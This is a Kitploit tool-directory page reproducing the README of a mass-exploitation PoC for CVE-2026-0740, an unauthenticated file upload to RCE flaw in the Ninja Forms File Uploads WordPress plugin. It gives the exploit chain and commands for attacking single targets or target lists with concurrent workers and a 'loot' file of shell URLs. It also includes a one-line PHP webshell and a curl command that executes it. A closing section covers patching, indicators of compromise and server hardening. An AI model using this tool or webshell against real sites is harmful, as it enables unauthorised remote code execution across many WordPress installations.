Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-0740-mass — 针对 CVE-2026-0740 的 PoC:Ninja Forms File Uploads <= 3.3.26 — 可导致 RCE 的未认证任意文件上传漏洞。 | Kitploit
工具/GitHubGitHub/exdev994/cve-2026-0740-mass
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubexdev994/cve-2026-0740-mass

CVE-2026-0740-mass

针对 CVE-2026-0740 的 PoC:Ninja Forms File Uploads <= 3.3.26 — 可导致 RCE 的未认证任意文件上传漏洞。

查看仓库
111个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-0740 — 批量目标利用引擎

作者: 0xNuts
贡献者: Cursor
仓库: https://github.com/ExDev994/CVE-2026-0740-mass

针对 CVE-2026-0740 的 PoC:Ninja Forms File Uploads <= 3.3.26 — 未认证任意文件上传,可导致 RCE。

该漏洞最初由 Sélim Lanouar (@whattheslime) 发现。批量目标利用引擎 PoC 由 0xNuts 开发,并得到 Cursor 的贡献。


免责声明

本仓库仅用于安全研究和防御目的(授权渗透测试、持有书面许可的红队行动、补丁验证和加固)。

  • 未经所有者明确许可,请勿针对任何系统使用。
  • 作者不对滥用此信息造成的后果承担任何责任。

漏洞摘要

WordPress 的 Ninja Forms - File Uploads 插件在 3.3.26(含)之前的所有版本中均存在 未认证任意文件上传 漏洞。

利用链:

  1. 未认证攻击者通过 AJAX action nf_fu_get_new_nonce 搭配任意 field_id 获取上传 nonce。
  2. nf_fu_upload 处理函数会验证上传文件的扩展名(例如 image.jpg),但攻击者可以通过 POST 参数(image_jpg)覆盖目标文件名。
  3. 目标文件名在未经过充分净化的情况下被传递给 move_uploaded_file() → 任意扩展名 + 路径遍历(../)。

完整补丁可在 3.3.27+ 版本中获得。


先决条件

  • Python 3.10+
  • 目标已安装并启用 Ninja Forms 和 Ninja Forms - File Uploads(<= 3.3.26)插件
  • 无需预先存在的表单或上传字段

安装依赖

本仓库仅包含 CVE-2026-0740.py 和 README.md。请手动安装依赖:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate          # Linux/macOS/WSL
# .venv\Scripts\activate           # Windows

pip install httpx==0.28.1 socksio==1.0.0

使用方法

CLI 帮助

root@kitploit:~
python3 CVE-2026-0740.py -h

参数选项

注意: 必须且仅使用 -t 或 -f 中的一个。


单目标模式

root@kitploit:~
python3 CVE-2026-0740.py -t http://target.com --shell shell.php

使用显式路径遍历:

root@kitploit:~
python3 CVE-2026-0740.py -t http://target.com --shell shell.php -d ../../../shell.php

批量目标模式

创建 target.txt 文件:

root@kitploit:~
http://site1.com
https://site2.com
10.0.0.5
# baris komentar diabaikan

运行:

root@kitploit:~
python3 CVE-2026-0740.py -f target.txt --shell shell.php

调整 worker 数并指定 loot 输出:

root@kitploit:~
python3 CVE-2026-0740.py -f target.txt --shell shell.php -w 50 -o loot.txt

成功上传的 shell URL 将写入 loot 文件(追加模式)。


最小化 Webshell 示例

root@kitploit:~
echo '<?php system($_GET["cmd"] ?? ""); ?>' > shell.php

上传成功后,脚本会显示 shell URL。验证(仅在实验室/授权目标上):

root@kitploit:~
curl "http://target.com/wp-content/shell.php?cmd=id"

插件版本检测(可选)

root@kitploit:~
httpx -fr -u http://target.com -ms 'file_uploads_nfpluginsettings-js' -er 'nfpluginsettings\.js\?ver=[\d\.]+'

修复方法(缓解措施)

1. 更新插件(最高优先级)

请立即将 Ninja Forms - File Uploads 更新到 3.3.27 或更高版本。

  • WordPress 管理后台 → 插件(Plugins) → 检查 Ninja Forms - File Uploads 的版本
  • 如果无法自动更新,请从官方供应商处下载已修补的版本

2. 验证补丁

更新后:

  • 确保插件版本 >= 3.3.27
  • 使用 action nf_fu_get_new_nonce / nf_fu_upload 测试 wp-admin/admin-ajax.php 端点 — 任意上传应被拒绝
  • 使用扫描器(Nuclei 模板 CVE-2026-0740)重新扫描以确认

3. 失陷指标(IoC)

检查 WordPress 上传目录:

root@kitploit:~
wp-content/uploads/ninja-forms/tmp/
wp-content/uploads/ninja-forms/
wp-content/

查找不应存在的可疑文件:.php、.pht、.phtml、.phar、.html、.svg、.js。

同时检查 Web 服务器日志中对以下路径的请求:

root@kitploit:~
/wp-admin/admin-ajax.php

其中包含参数 action=nf_fu_get_new_nonce 或 action=nf_fu_upload。

4. 额外加固

  • 在 /wp-admin/admin-ajax.php 上启用 WAF / 速率限制,以阻止批量上传滥用

  • 通过 Web 服务器配置在 wp-content/uploads/ 目录中禁用 PHP 执行:

    Apache(位于 uploads/ 目录的 .htaccess):

    root@kitploit:~
    <FilesMatch "\.php$">
      Require all denied
    </FilesMatch>
    

    Nginx:

    root@kitploit:~
    location ~* /wp-content/uploads/.*\.php$ {
        deny all;
    }
    
  • 最小权限:确保上传文件的权限不允许 Web 服务器写入所需目录之外的路径

  • 监控:对来自陌生 IP 或高频率的、带有 nf_fu_* action 的 admin-ajax.php POST 请求设置告警

  • 备份与应急响应:若发现 IoC,请隔离站点、轮换数据库/管理员凭据,并审计其他插件/主题

5. 如果未使用该插件

如果不需要上传功能,请禁用并删除 Ninja Forms - File Uploads 插件。


参考资料

  • CVE-2026-0740
  • Lexfo — 技术深度分析
  • Wordfence — 50,000 个 WordPress 站点受影响
  • GHSA-v8wq-rjpf-669f
  • Nuclei 模板
下载工具
向量 / 扩展名<= 3.3.243.3.253.3.263.3.27
路径遍历(../)PASS---
.phpPASS---
.phtml、.pharPASSPASS--
.phtPASSPASSPASS-
.html、.svg、.jsPASSPASSPASS-
Flag功能
-t, --target单个目标(单个 URL)
-f, --targets-file包含目标列表的 .txt 文件(每行一个 URL)
--shell要上传的 payload/webshell 文件(必需)
-d, --dest目标路径遍历(默认:../../../)
-w, --workers并发线程数(默认:20)
-o, --output成功 shell URL 的 loot 文件(默认:results.txt)
-x, --proxyHTTP 代理(例如 http://127.0.0.1:8080)
-H, --headers自定义请求头(格式:'Header: Value')
--timeoutHTTP 超时时间(秒)(默认:10)